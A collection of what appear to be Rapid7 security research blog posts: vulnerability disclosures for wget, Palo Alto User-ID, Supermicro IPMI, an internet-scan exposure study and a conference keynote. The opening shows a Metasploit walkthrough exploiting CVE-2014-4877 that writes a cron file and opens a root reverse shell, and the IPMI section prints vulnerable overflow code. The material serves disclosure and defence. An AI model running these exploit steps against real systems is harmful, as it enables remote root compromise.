msf exploit(handler) > set LHOST 192.168.0.4
msf exploit(handler) > set LPORT 4444
msf exploit(handler) > run -j
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.0.4:4444

Finally we switch to the wget module itself:

msf exploit(handler) > use auxiliary/server/wget_symlink_file_write
msf auxiliary(wget_symlink_file_write) > set TARGET_FILE /etc/cron.d/cronshell
msf auxiliary(wget_symlink_file_write) > set TARGET_DATA file:cronshell
msf auxiliary(wget_symlink_file_write) > set SRVPORT 21
msf auxiliary(wget_symlink_file_write) > run
[+] Targets should run: $ wget -m ftp://192.168.0.4:21/
[*] Server started.

At this point, we just wait for the target user to run wget -m ftp://192.168.0.4:21/

[*] 192.168.0.2:52251 Logged in with user 'anonymous' and password 'anonymous'...
[*] 192.168.0.2:52251 -> LIST -a
[*] 192.168.0.2:52251 -> CWD /1X9ftwhI7G1ENa
[*] 192.168.0.2:52251 -> LIST -a
[*] 192.168.0.2:52251 -> RETR cronshell
[+] 192.168.0.2:52251 Hopefully wrote 186 bytes to /etc/cron.d/cronshell
[*] Command shell session 1 opened (192.168.0.4:4444 -> 192.168.0.2:58498) at 2014-10-27 23:19:02 -0500

msf auxiliary(wget_symlink_file_write) > sessions -i 1
[*] Starting interaction with 1...
id
uid=0(root) gid=0(root) groups=0(root),1001(rvm)

Disclosure Timeline

The issue was discovered by HD Moore of Rapid7, and was disclosed to both the upstream provider of Wget and CERT/CC as detailed below:

Thu, Aug 28, 2014: Issue discovered by HD Moore and advisory written
Thu, Aug 28, 2014: Advisory provided to Giuseppe Scrivano, the maintainer of Wget
Sat, Sep 01, 2014: Vendor responded, confirmed issue and patch
Tue, Sep 30, 2014: Advisory provided to CERT/CC
Tue, Oct 07, 2014: CVE-2014-4877 assigned via CERT/CC
Mon, Oct 27, 2014: Redhat bug 1139181 published
Tue, Oct 28, 2014: Rapid7 advisory and Metasploit module published as PR 4088

R7-2014-16: Palo Alto Networks User-ID Credential Exposure


Project Sonar tends to identify unexpected issues, especially with regards to network security products. In July of this year, we began to notice a flood of incoming SMB connections every time we launched the VxWorks WDBRPC scan. To diagnose the issue, we ran the Metasploit SMB Capture module on one of our scanning nodes and collected the results. After reviewing the data, we noticed a common trend in the usernames of the incoming SMB connections.

After some digging, we traced this back to the Palo Alto Networks (PAN) User-ID feature, an optional component provided by PAN that "gives network administrators granular controls over what various users are allowed to do when filtered by a Palo Alto Networks Next-Generation Firewall". We contacted PAN and they confirmed that some of their customers must have misconfigured User-ID to enable the feature on external/untrusted zones. In summary, every time we triggered a PAN filter on a misconfigured appliance, our scanning node would receive an inbound authentication attempt from User-ID. This issue is not a vulnerability in the typical sense, but we felt that the impact was significant enough that it required notification and public disclosure.

A number of PAN customers have enabled Client Probing and Host Probing within the User-ID settings, but have not limited these probes to trusted zones or the internal IP space of the organization. As a result, an external attacker can trigger a security event on the PAN appliance, resulting in an outbound SMB connection from User-ID to the attacker's IP address. This in turn allows an attacker to obtain the username, domain name, and encrypted password hash (typically in NetNTLM format) of the account that User-ID is configured to use. Since this feature requires privileged rights, the encrypted password hash is a serious concern and can expose the organization to a remote compromise.

In addition to simply capturing the authentication details from the User-ID probe, the attacker could use off-the-shelf tools to relay the authentication back to any external-facing customer asset that accepts NTLMSSP authentication from the external network. Common examples include SSL VPNs, Outlook Web Access, and Microsoft IIS web servers.

The issue of Windows account exposure through automated services is well-known and applies to almost every systems management product and utility in the Windows ecosystem. The PAN User-ID misconfiguration can present a serious exposure depending on the privileges granted to the service account assigned to User-ID. The same issue applies to thousands of products that perform automated authentication within the Windows ecosystem, and we have observed the same misconfiguration in similar products. A correctly configured User-ID will still attempt to authenticate to internal hosts when Client Probing or Host Probing are enabled.

It is possible to configure service accounts and the network in a way that mitigates the impact of NTLM relay and password hash cracking attacks. For more information on hardening Windows service accounts, please see the Mitigating Service Account Credential Theft on Windows whitepaper.

Palo Alto Networks has released an advisory to track this issue. PAN customers should review the Best Practices for Securing User-ID Deployments document and immediately restrict User-ID to trusted zones or at least the IP ranges of trusted networks.
We also recommend that customers review the Windows Service Account Credentials white paper, with an emphasis on hardening NTLM and blocking egress traffic on TCP ports 135, 139, and 445. This document also goes into methods that can be used to detect the use of stolen accounts, something that Rapid7 UserInsight customers can take advantage of today.

Mitigating Service Account Credential Theft


I am excited to announce a new whitepaper, Mitigating Service Account Credential Theft on Windows. This paper was a collaboration between myself, Joe Bialek of Microsoft, and Ashwath Murthy of Palo Alto Networks. The executive summary is shown below:

Over the last 15 years, the Microsoft Windows ecosystem has expanded with the meteoric rise of the internet, business technology, and computing in general. The number of vendors that provide management, assessment, and monitoring tools has exploded, along with the need for these products to handle ever-growing networks and respond to evolving security threats. The networks themselves are now becoming less trusted, as targeted attacks, advanced malware, cloud services, and bring-your-own-device (BYOD) policies erode the historic trust model of internal versus external networks. The time has come to assume breach when considering all aspects of network security.

Mindsets about the network perimeter may be changing, but most management, assessment, and monitoring products still rely on trust boundaries and unidirectional authentication to the assets they access. For example, an automated backup service running on a central server under the context of a privileged account may automatically authenticate to workstations in order to access their file systems. A compromised or otherwise untrusted workstation can take advantage of this to steal the credentials of the backup service during the authentication process. Similar problems affect everything from network monitoring systems to vulnerability assessment products.

This has led to an "elephant in the room" mentality among security practitioners, where there is a tacit understanding that the automated tools they use to maintain the security of the network could end up enabling an attack instead. Security product vendors often call out these risks in their documentation, but the greater IT ecosystem is less likely to be aware of these problems.

This document describes practical mitigation strategies that reduce the effectiveness of attacks against automated authentication processes in a Windows environment, with a focus on accounts used by privileged services. Specific attacks are documented, along with mitigation techniques that apply to all commonly-used versions of the Windows operating system.

HD Moore
Chief Research Officer
Rapid7, Inc.

PS. The pass-the-hash guidance (v2) from Microsoft is a great read for anyone interested in learning more about Windows authentication and the NTLM protocol in particular. Many of the mitigations for service account protection are also applicable to defending against pass-the-hash attacks.

-HD

Goodnight, BrowserScan


The BrowserScan concept emerged during the heyday of Java zero-day exploits in 2012. The risk posed by out-of-date browser addons, especially Java and Flash, was a critical issue for our customers and the greater security community. The process of scanning each desktop for outdated plugins was something that many firms couldn't do easily. BrowserScan helped these firms gather macro-level exposure data about their desktop systems, providing a quick health-check of their patch management process.

Our no-scan and no-agent approach did have some drawbacks. It was difficult to identify vulnerable users behind a NAT gateway without doing deep integration with internal web applications. Our ability to track browser-specific vulnerabilities was hampered by consistency issues between vendors. Additionally, some of our users didn't want a cloud-based solution and asked for an on-premise installation instead. These limitations were acceptable so long as the primary use case of identifying out-of-date addons was helping the community.

Over the last two years, web browsers and their associated addons have evolved to reduce the risk of attack. Java no longer runs applets by default. Firefox no longer allows outdated plugins to load. Internet Explorer 10 now throws a nasty popup when a site tries to detect whether Java is installed. Chrome manages its plugins as part of the browser itself, which is constantly being updated. In short, most of the attack surface that BrowserScan was designed to detect is no longer accessible. Even worse, trying to detect out-of-date addons now causes some browsers to emit warnings about a possible attack.

We feel that the browser addon ecosystem has changed enough that BrowserScan has outlived its usefulness. We will begin ramping down the service immediately, first by disabling new account creation and then gradually reducing the services. If you are an active user, you will receive an email soon describing the ramp-down process and the timeline for removing the widget from your web sites.

If you have any questions, you can reach the BrowserScan team via research[at]rapid7.com

Update: We have released PluginScan, an open source implementation of BrowserScan available under the MIT license.

-HD

Supermicro IPMI Firmware Vulnerabilities


Introduction

This post summarizes the results of a limited security analysis of the Supermicro IPMI firmware. This firmware is used in the baseboard management controller (BMC) of many Supermicro motherboards. The majority of our findings relate to firmware version SMT_X9_226. The information in this post was provided to Supermicro on August 22nd, 2013 in accordance with the Rapid7 vulnerability disclosure policy. More information on this policy can be found online at http://www.rapid7.com/disclosure.jsp. Note that this assessment did not include the actual IPMI network services and was primarily focused on default keys, credentials, and the web management interface. Although we have a number of Metasploit modules in development to test these issues, they are not quite ready for production use yet, so stay tuned for next week's Metasploit update. At our last count, over 35,000 Supermicro IPMI interfaces were exposed to the public internet.

Supermicro has published a new firmware version (SMT_X9_315) that appears to address many of the issues identified below, as well as those reported by other researchers. We have updated each entry to indicate how the new firmware version impacts these issues. A cursory review of the new firmware shows significant improvements, but we still recommend disconnecting the IPMI interface from untrusted networks and limiting access through another form of authentication (VPN, etc).

Static Encryption Keys (CVE-2013-3619)

The firmware ships with hardcoded private encryption keys for both the Lighttpd web server SSL interface and the Dropbear SSH daemon. An attacker with access to the publicly available Supermicro firmware can perform man-in-the-middle and offline decryption of communication to the firmware. The SSL keys can be updated by the user, but there is no option available to replace or regenerate SSH keys. We have not been able to determine if firmware version SMT_X9_315 resolves this issue.

Hardcoded WSMan Credentials (CVE-2013-3620)

The firmware contains two sets of credentials for the OpenWSMan interface. The first is the digest authentication file, which contains a single account with a static password. This password cannot be changed by the user and is effectively a backdoor. The second involves the basic authentication password file stored in the nv partition; it appears that due to a bug in the firmware, changing the password of the ADMIN account leaves the OpenWSMan password unchanged (still set to admin). We have not been able to determine if firmware version SMT_X9_315 resolves this issue.

CGI: login.cgi (CVE-2013-3621)

The login.cgi CGI application is vulnerable to two buffer overflows. The first occurs when processing the name parameter: the value is copied with strcpy() into a 128-byte buffer without any length checks. The second issue relates to the pwd parameter: the value is copied with strcpy() into a 24-byte buffer without any length checks. Exploitation of these vulnerabilities would result in remote code execution as the root user account. The vulnerable code is shown below (auto-generated from IDA Pro HexRays).

if ( cgiGetVariable("name") ) {
  v2 = (const char *)cgiGetVariable("name");
  strcpy(&dest, v2);
}
if ( cgiGetVariable("pwd") ) {
  v3 = (const char *)cgiGetVariable("pwd");
  strcpy(&v13, v3);
}

Firmware version SMT_X9_315 removes the use of strcpy() and limits the length of the name and pwd values to 64 and 20 bytes, respectively.
CGI: close_window.cgi (CVE-2013-3623)

The close_window.cgi CGI application is vulnerable to two buffer overflows. The first issue occurs when processing the sess_sid parameter: this value is copied with strcpy() to a 20-byte stack buffer without any length checks. The second issue occurs when processing the ACT parameter: this value is copied with strcpy() to a 20-byte stack buffer without any length checks. Exploitation of these vulnerabilities would result in remote code execution as the root user account. The vulnerable code is shown below (auto-generated from IDA Pro HexRays).

if ( cgiGetVariable("sess_sid") ) {
  v1 = (const char *)cgiGetVariable("sess_sid");
  strcpy(&v19, v1);
}
...
if ( cgiGetVariable("ACT") ) {
  v3 = (const char *)cgiGetVariable("ACT");
  strcat(&nptr, v3);
...

Firmware version SMT_X9_315 completely removes this CGI from the web interface.

CGI: logout.cgi (CVE-2013-3622) [ authenticated ]

The logout.cgi CGI application is vulnerable to two buffer overflows. The first occurs when processing the SID parameter: the value is copied with strcpy() into a 20-byte buffer without any length checks. The second issue relates to further use of the SID parameter: the value is appended with strcat() into a 32-byte buffer without any length checks. Exploitation of these vulnerabilities would result in remote code execution as the root user account. The vulnerable code is shown below (auto-generated from IDA Pro HexRays).

if ( cgiGetVariable("SID") ) {
  v4 = (const char *)cgiGetVariable("SID");
  strcpy(&s, v4);
}

Firmware version SMT_X9_315 switches to a GetSessionCookie() function that limits the length of the SID variable returned to this code and no longer calls strcpy().

CGI: url_redirect.cgi (NO CVE) [ authenticated ]

The url_redirect.cgi CGI application appears to be vulnerable to a directory traversal attack due to lack of sanitization of the url_name parameter. This may allow an attacker with a valid non-privileged account to access the contents of any file on the system. This includes the /nv/PSBlock file, which contains the clear-text credentials for all configured accounts, including the administrative user. The vulnerable code is shown below (auto-generated from IDA Pro HexRays).

sprintf(&v23, "%s/%s", *(_DWORD *)&ext_name_table[12 * i + 8], s);
v18 = fopen(&v23, "r");

Firmware version SMT_X9_315 appears to fix this issue.

CGI: miscellaneous (NO CVE) [ authenticated ]

Numerous unbounded strcpy(), memcpy(), and sprintf() calls are performed by the other 65 CGI applications available through the web interface. Most of these applications verify that the user has a valid session first, limiting exposure to authenticated users, but the review was not comprehensive. All instances of unsafe string and system command handling should be reviewed and corrected as necessary. Exploitation of these issues allows a low-privileged user to gain root access to the device. Firmware version SMT_X9_315 has reorganized the web root, adding quite a few new CGI applications, removing many more, and generally purging the use of insecure functions like strcpy(). In addition, the config_tftpd.cgi and snmp_config.cgi CGI applications now validate that the user has a valid session first. They did not before, but it wasn't clear what risk this posed. In fact, the only two CGI applications that are now exposed to unauthenticated users are vmstatus.cgi and login.cgi.
Disclosure Timeline

2013-08-22 (Thu): Initial discovery and disclosure to vendor
2013-09-07 (Fri): Vendor response
2013-09-09 (Mon): Disclosure to CERT/CC
2013-10-23 (Wed): Planned public disclosure (delayed)
2013-11-06 (Wed): Public disclosure
2013-11-06 (Wed): Scanner modules written
2013-11-06 (Thu): Vendor indicates a fix is available

Project Sonar: One Month Later

It has been a full month since we launched Project Sonar and I wanted to provide a quick update about where things are, the feedback we have received, and where we are going from here. We have received a ton of questions from interested contributors about…

It has been a full month since we launched Project Sonar and I wanted to provide a quick update about where things are, the feedback we have received, and where we are going from here.

We have received a ton of questions from interested contributors about the legal risk of internet-wide scanning. These risks are real, but differ widely by region, country, and type of scan. We can't provide legal advice, but we have obtained help from the illustrious Marcia Hofmann, who has written a great blog post describing the issues involved. As always, every situation is different, and we do recommend getting legal counsel before embarking on your own scans. If you don't have the appetite (or budget) to hire a lawyer, you can still get involved on the research side by downloading and analyzing the publicly available datasets from Scans.IO.

Currently, we are running regular scans for SSL certificates, IPv4 reverse DNS lookups, and most recently, HTTP GET requests. Our current challenge is automating the pipeline between the job scheduler and the final upload to the Scans.IO portal. We should have the process worked out and the new datasets publicly available in the next couple of weeks. As the processing side improves, we will continue to add new protocols and types of probes to our recurring scans. If you have any ideas for what you would like to see covered, please leave a comment below, or get in touch via research-at-rapid7.com. -HD

Estimating ReadyNAS Exposure with Internet Scans

I wanted to share a brief example of using a full scan of IPv4 to estimate the exposure level of a vulnerability. Last week, Craig Young, a security researcher at Tripwire, wrote a blog post about a vulnerability in the ReadyNAS network storage appliance. In an…

I wanted to share a brief example of using a full scan of IPv4 to estimate the exposure level of a vulnerability. Last week, Craig Young, a security researcher at Tripwire, wrote a blog post about a vulnerability in the ReadyNAS network storage appliance. In an interview with Threatpost, Craig mentioned that although Netgear produced a patch in July, a quick search via SHODAN indicates that many users are still vulnerable, leaving them exposed to any attacker who can diff the patched and unpatched firmware. This seemed like a great opportunity to review our Project Sonar HTTP results and tease out recent exposure rates from a single-pass scan of the IPv4 internet.

The first thing I did was grab the patched and unpatched firmware, unzip the archives, extract them with binwalk, and run a quick diff between the two. The vulnerability is obviously on line 17 of the diff and is the result of an attacker-supplied $section variable being interpreted as arbitrary Perl code. Given that the web server runs as root and Metasploit is quite capable of exploiting Perl code injection vulnerabilities, this seems like a low bar to exploit.

Identifying ReadyNAS devices ended up being fairly easy. In response to a GET request on port 80, a device will respond with the following static HTML.

<meta http-equiv="refresh" content="0; url=/shares/">
<!-- Copyright 2007, NETGEAR All rights reserved. -->

Our scan data is in the form of base64-encoded responses stored as individual lines of JSON:

{"host": "A.B.C.D", "data": "SFRUUC8xLjAgNDAwIEJhZCB...", "port": 80}

I wrote a quick script to process this data via stdin, match ReadyNAS devices, and print out the IP address and Last-Modified date from the header of the response (a rough reconstruction of the script is included below). I ran the raw scan output through this script and made some coffee. The result from our October 4th scan consisted of 3,488 lines of results. This is a little different from the numbers listed by SHODAN, but the difference can be explained by DHCP, multiple merged scans, and the fact that the ReadyNAS web interface is most commonly accessed over SSL on port 443. The results looked like the following:

xxx.xxx.xxx.169 Thu, 07 Oct 2010 00:53:51 GMT
xxx.xxx.xxx.42  Thu, 07 Oct 2010 00:53:51 GMT
xxx.xxx.xxx.94  Tue, 02 Jul 2013 01:42:23 GMT
xxx.xxx.xxx.113 Mon, 29 Aug 2011 23:04:43 GMT

The interesting part about the Last-Modified header is that it seems to correlate with specific firmware versions. Version 4.2.24 was built on July 2nd, 2013, and we can assume that all versions prior to that are unpatched.

$ cat readynas.txt | perl -pe 's/\d+\.\d+\.\d+\.\d+\t//' | sort | uniq -c | sort -rn
    717 Tue, 02 Jul 2013 01:33:54 GMT
    510 Tue, 02 Jul 2013 01:42:23 GMT
    429 Fri, 24 Aug 2012 22:55:26 GMT
    383 Wed, 05 Sep 2012 07:33:52 GMT
    212 Mon, 13 Jul 2009 20:56:46 GMT
    209 Mon, 29 Aug 2011 23:04:43 GMT
    200 Fri, 02 Sep 2011 00:51:04 GMT
    189 Sat, 06 Nov 2010 00:10:06 GMT
    133 Thu, 02 May 2013 17:00:27 GMT
    112 Thu, 31 May 2012 18:40:25 GMT
    .................................

If we exclude all results with a Last-Modified date equal to or newer than July 2nd, 2013, we end up with 2,257 of 3,488 devices vulnerable; in other words, approximately 65% of the ReadyNAS devices exposing their web interface to the internet on port 80 are remotely exploitable. It isn't clear whether these statistics would change significantly if the same scan were performed on port 443, or how the exposure rate has changed since this particular scan was run.
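For reference, here is a rough reconstruction of the stdin filter described above. The matching strings come straight from the ReadyNAS response shown earlier, but the rest of the handling is my own sketch rather than the original script.

# Rough reconstruction of the filter described above: read Sonar HTTP records
# (one JSON object per line), base64-decode the response, keep anything that looks
# like the ReadyNAS meta-refresh page, and print the IP plus the Last-Modified
# header. This is a sketch of the approach, not the original script.
import base64
import json
import re
import sys

MARKERS = (b'url=/shares/', b'Copyright 2007, NETGEAR')   # from the static HTML above
LAST_MODIFIED = re.compile(rb'^Last-Modified:\s*(.+?)\r?$', re.I | re.M)

for line in sys.stdin:
    try:
        record = json.loads(line)
        raw = base64.b64decode(record["data"])
    except (ValueError, KeyError):
        continue
    if not all(marker in raw for marker in MARKERS):
        continue
    match = LAST_MODIFIED.search(raw)
    stamp = match.group(1).decode("ascii", "replace") if match else "unknown"
    print("%s\t%s" % (record["host"], stamp))

Piping the raw scan output through it (for example, zcat sonar_http_80.json.gz | python3 readynas_filter.py > readynas.txt) produces the per-IP list that the perl one-liner above then tallies; the file names here are placeholders.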
This does give us a starting point to figure out how popular these devices are and what specific industries and regions are most affected, but I will leave that to a future blog post. If you are interested in seeing an exploit in action, Craig is hosting a demo on Tuesday, October 29th. -HD

The Security Space Age

I was fortunate enough to present as the keynote speaker for HouSecCon 4. The first part of my presentation focused on the parallels between information security today and the dawn of the space age in the late 1950s. The second section dove into internet-wide measurement…

I was fortunate enough to present as the keynote speaker for HouSecCon 4. The first part of my presentation focused on the parallels between information security today and the dawn of the space age in the late 1950s. The second section dove into internet-wide measurement and details about Project Sonar. Since it may be a while before the video of the presentation is online, I wanted to share the content for those who may be interested and could not attend the event. A summary of the first section is below and the full presentation is attached to the end of this post.

In 1957 the Soviet Union launched Sputnik, the first artificial satellite. The US public, used to being first in most things scientific, panicked at being beaten to space. This led to unprecedented levels of funding for science, math, and technology programs, the creation of NASA, and the first iteration of DARPA, known then as ARPA. Sputnik also set the precedent for the “freedom of space”.

Although Sputnik was the first salvo in the space race, it was quickly left in the dust by increasingly powerful spy satellites. The cold war accelerated technology by providing both funding and a focus for new development. Limited visibility meant that both sides were required to overestimate the capabilities of the other, driving both reconnaissance and weapon technology to new heights.

The space age changed how we looked at the world. The internet was born from ARPA's attack-resistant computer network. Military technology was downleveled for civil use. GPS and public satellite imagery shrank the physical world. Public visibility led to accountability for despots and companies around the world. Global imagery shone a light on some of the darkest corners of the planet.

Technology developed in the paranoid shadows of the cold war radically changed how we live our lives today. The proverbial swords turned into plowshares faster than we could imagine.

The differences between military and consumer capabilities are shrinking every year. Crypto export control is useless in the face of strong implementations in the public domain. Alternatives to GPS are launching soon and location awareness has gone well beyond satellite triangulation. High-resolution thermal imaging systems are available off-the-shelf from international suppliers.

So what does all of this have to do with information security? There are direct parallels between the start of the space age and the last decade of information security. Public fear over being out-gunned and out-innovated triggered a demand for improved security. Consumers and businesses are becoming aware of the real-world impact that a security failure can have. The more we move online, the more is at risk. Technology has been pushing forward at a phenomenal pace. Network neutrality draws parallels with the concept of “freedom in space”. Out of this environment, predators have emerged: first opportunistic criminals, and now organized crime, law enforcement, and intelligence agencies.

The Snowden leaks have painted a detailed picture of how the US and its allies monitor and infiltrate computer networks around the globe. Although most of the security community assumed this kind of intelligence gathering went on, having it confirmed and brought into the limelight has been something else. Even the tin foil hat crowd didn't appear to be paranoid enough. Indeed, claims against China and Russia look weak in comparison to what we now know about US intelligence activities.
To me, the most surprising thing is the lack of “cutting edge” techniques that have been exposed. Most of the methods and tools that have been leaked are not much different from what the security community is actively discussing at conferences like this one.

In fact, many of the tools and processes used by both intelligence and military groups are based on work by the security community. Snort, Nmap, Metasploit, and dozens of other open source security tools are mainstays of government-funded security operations, both defensive and offensive. Governments of every major power are pouring money into “cyber”, but the overlap between “secret” and “this talk I saw at defcon” is larger than ever. The biggest difference is where and how the techniques or tools are being used. Operationalized offense and defense processes are the dividing line between the defense industrial base and everyone else.

It doesn't take a lot of skill or resources to break into most internet-facing systems. If the specific target is well-secured, the attacker can shift focus to another system nearby or even a system upstream. The number of vulnerable embedded devices on the internet is simply mind-boggling. The Snowden leaks also confirmed that routers and switches are often preferred targets for intelligence operatives for this reason. My research efforts over the last few years have uncovered tens of millions of easily compromised devices on the internet. The number doesn't get any smaller. More and more vulnerable equipment continues to pile up.

IBM, Symantec, SANS, and SecureWorks all provide internet “Threat Levels”. Dozens of commercial firms offer “threat intelligence” services. What actionable data are you getting from these firms? How do you know whether what they are providing is even accurate?

Case in point: during 2012, an unknown researcher compromised 1.2 million nodes using telnet and one of three passwords. 420,000 of those nodes were then used to conduct a scan of over 700 TCP and UDP ports across the entire internet. The same nodes were also used to send ICMP probes and traceroutes to every addressable IPv4 address. Not a single “threat intelligence” vendor noticed the telnet exposure, the mass compromise, or the scanning activity. In fact, nobody noticed at all, and the internet became aware of the project only after the researcher published a 9TB data dump along with extensive documentation and statistics. The graphic you are seeing now shows a 24-hour cycle of active public internet IPs (via ICMP) from this project.

We can't improve things unless we can measure them. We can't defend our networks without knowing all of the weak links. We are starved for real information about internet threats. Not the activities of mindless bots and political activists, but the vulnerabilities that will be used against us in the future. Without this, we can't make good decisions, and we can't place pressure on negligent organizations. So, let's measure it. It is time for better visibility. It is time for accelerated improvement. It is time for a security space age. -HD

Welcome to Project Sonar!

Project Sonar is a community effort to improve security through the active analysis of public networks. This includes running scans across public internet-facing systems, organizing the results, and sharing the data with the information security community. The three components to this project are tools, datasets,…

Project Sonar is a community effort to improve security through the active analysis of public networks. This includes running scans across public internet-facing systems, organizing the results, and sharing the data with the information security community. The three components to this project are tools, datasets, and research. Please visit the Sonar Wiki for more information.
